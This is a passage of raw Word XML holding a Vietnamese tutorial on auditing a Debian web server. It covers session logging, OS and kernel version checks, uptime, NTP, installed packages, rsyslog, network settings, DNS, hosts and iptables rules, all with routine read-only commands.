    <w:p w14:paraId="29C9E306" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó ta sử dụng bất kì lệnh command nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41171740"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Rồi dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>cat screenlog.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để xuất tất cả những lệnh ta đã gõ và lưu lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3C353"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a dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>mv screenlog.0 Audit-user-date.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để save về máy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C90F29" w14:textId="46C63013"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624D33B9">
          <v:shape id="Picture 51" o:spid="_x0000_i1209" type="#_x0000_t75" style="width:391.5pt;height:38.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId205" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5760B9"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ta dùng lệnh uname để xem tên user đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C268853" w14:textId="5F72BB6D"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79D79B6E">
          <v:shape id="_x0000_i1210" type="#_x0000_t75" style="width:134.25pt;height:36pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId206" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48C04D"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a tạo thư mục </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B063665"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 xml:space="preserve">Cd /tmp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5861943C"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Mkdir audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280AFF1"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Cd audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEA8AD8"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ể lưu file uname ta dùng lệnh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD2F39"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 xml:space="preserve">uname &amp;&gt; /tmp/audit/uname.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356984BC" w14:textId="45BD8697"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31708C27">
          <v:shape id="Picture 9" o:spid="_x0000_i1211" type="#_x0000_t75" style="width:336.75pt;height:36pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId207" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C15F0D9" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để xem được nội dung phiên bản của hệ điều hành chúng ta mở file của hệ thống bằng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5726C"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Cat /etc/debian_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C37EEA" w14:textId="71FDDFB4"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EB9339E">
          <v:shape id="Picture 10" o:spid="_x0000_i1212" type="#_x0000_t75" style="width:234.75pt;height:43.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId208" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E89D25" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Debian 6 là phiên bản ổn định hiện tại, do đó chúng ta không phải lo lắng về việc ngưng hoạt động. Nhưng đối với phiên bản cũ hơn, điều quan trọng là phải kiểm tra xem phiên bản có còn được hỗ trợ để biết liệu các lỗ hổng mới có được vá hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE14884" w14:textId="0BAA4295" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để xem được nhân của phiên bản,</w:t>
      </w:r>
      <w:r w:rsidR="00001EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ngày phát hành ta dùng lệnh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7D303"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Uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F56D284" w14:textId="41C9848E"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44E1007">
          <v:shape id="Picture 11" o:spid="_x0000_i1213" type="#_x0000_t75" style="width:466.5pt;height:38.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId209" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6BCD1" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Dựa trên thông tin phiên bản này, chúng ta cần xác định xem có lỗ hổng bảo mật nào đã được xuất bản cho phiên bản cụ thể này hay không.  Đảm bảo rằng ta đang kiểm tra phiên bản này theo danh sách các lỗ hổng phân phối, vì hầu hết các bản phân phối Linux đều vá các bản vá cổng sau mà không thay đổi phiên bản chính và phụ của nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19164D82" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra thời gian hoạt động của một hệ thống Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A834D2" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Uptime</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFEFF6E" w14:textId="415F6209"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30A191B4">
          <v:shape id="Picture 12" o:spid="_x0000_i1214" type="#_x0000_t75" style="width:417pt;height:26.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId210" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A0012" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây chúng ta có thể thấy rằng hệ thống đã hoạt động được 13 phút, kernel thực sự khó có thể được vá trong khoảng thời gian này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601759A"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đó là quản lý thời gian. Ta có thể thấy được múi giờ được cấu hình bằng file UTC qua lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41095E3A"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cat /etc/timezone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70A346" w14:textId="412D78A5"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4982FCEA">
          <v:shape id="Picture 13" o:spid="_x0000_i1215" type="#_x0000_t75" style="width:202.5pt;height:26.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId211" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3483DB" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dùng lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ps -edf | grep ntp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB330B7" w14:textId="0706B5A1"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3C439061">
          <v:shape id="Picture 14" o:spid="_x0000_i1216" type="#_x0000_t75" style="width:468.75pt;height:45.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId212" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160B33F" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây chúng ta có thể thấy rằng máy chủ NTP đang được hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C95EC3"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ta kiểm tra các gói đã được cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294547BE" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Luôn luôn là một điều tốt để kiểm tra xem số lượng gói được giới hạn ở mức tối thiểu nghiêm ngặt để hạn chế sự tiếp xúc của hệ thống.  Hơn nữa, vì hệ thống đã được kiểm duyệt được sử dụng như một máy chủ web, một số gói chẳng hạn như những gói liên quan đến giao diện đồ họa (X, Gnome, KDE) hoặc trò chơi là không cần thiết và không nên cài đặt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE02E3"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dpkg -l | less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21A784" w14:textId="7CF7A8CE"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49E8A466">
          <v:shape id="Picture 15" o:spid="_x0000_i1217" type="#_x0000_t75" style="width:405.75pt;height:284.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId213" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F243FC2" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Về phần đăng nhập, chúng ta có thể kiểm tra xem tài khoản đang được đăng nhập và sử dụng trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEAFEC"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ps -edf | grep syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749FBE48" w14:textId="2E986C4F"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4BD1117B">
          <v:shape id="Picture 16" o:spid="_x0000_i1218" type="#_x0000_t75" style="width:423pt;height:49.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId214" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53D049" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>rsyslog</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được cấu hình bởi file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/etc/rsyslog.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>. Bằng cách xem lại tệp cấu hình, chúng ta có thể thấy rằng rsyslog trên hệ thống này không được định cấu hình để nhận nhật ký.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A4B60"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Cat /etc/rsyslog.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA66F6" w14:textId="168D0993"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5578CE3E">
          <v:shape id="Picture 17" o:spid="_x0000_i1219" type="#_x0000_t75" style="width:402pt;height:228.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId215" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACB0FA" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560E36D8"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Phần tiếp theo là về mạng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5AD601"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Xem các cấu hình mạng địa chỉ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ip,subnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D0E6E4" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig –a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>để xem các loại mạng hiện có.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E367C7D" w14:textId="73429035"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D5AE652">
          <v:shape id="Picture 18" o:spid="_x0000_i1220" type="#_x0000_t75" style="width:330pt;height:167.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId216" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52A212" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Route –n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để lấy được các thông tin hệ thống route. Nếu như hệ thống không được cài đặt lệnh này thì có thể sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>netstat –rn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể là một lệnh thay thế phù hợp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C208480" w14:textId="6FD5A391"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2DD21753">
          <v:shape id="Picture 19" o:spid="_x0000_i1221" type="#_x0000_t75" style="width:468pt;height:73.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId217" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687F4FE" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để xem được các cấu hình DNS của hể thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEB3F3" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>cat /etc/resolv.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA5EE7" w14:textId="244C8300"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7B3E68EF">
          <v:shape id="Picture 20" o:spid="_x0000_i1222" type="#_x0000_t75" style="width:239.25pt;height:49.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId218" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30776D6E" w14:textId="184B6C01" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>cat /etc/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADE090" w14:textId="56350022"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231ACCF1">
          <v:shape id="Picture 21" o:spid="_x0000_i1223" type="#_x0000_t75" style="width:328.5pt;height:83.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId219" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="598CD8B7" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra tường lửa. Có hai vấn đề cần kiểm tra của tường lửa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62CD9C" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đó là các quy tắt của tường </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>lửa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>set rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68768714" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra xem các quy tắt có giữ lại toàn diện khi mà chúng ta khởi động lại máy hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628E6F4" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tại đây, chúng ta có thể truy xuất các quy tắc tường lửa bằng cách sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30EC92"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Iptables –L -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F04CEC" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC3AFD5" w14:textId="5B7A3A2C"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3354E8F8">
          <v:shape id="Picture 22" o:spid="_x0000_i1224" type="#_x0000_t75" style="width:468pt;height:153pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId220" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D5DC3" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
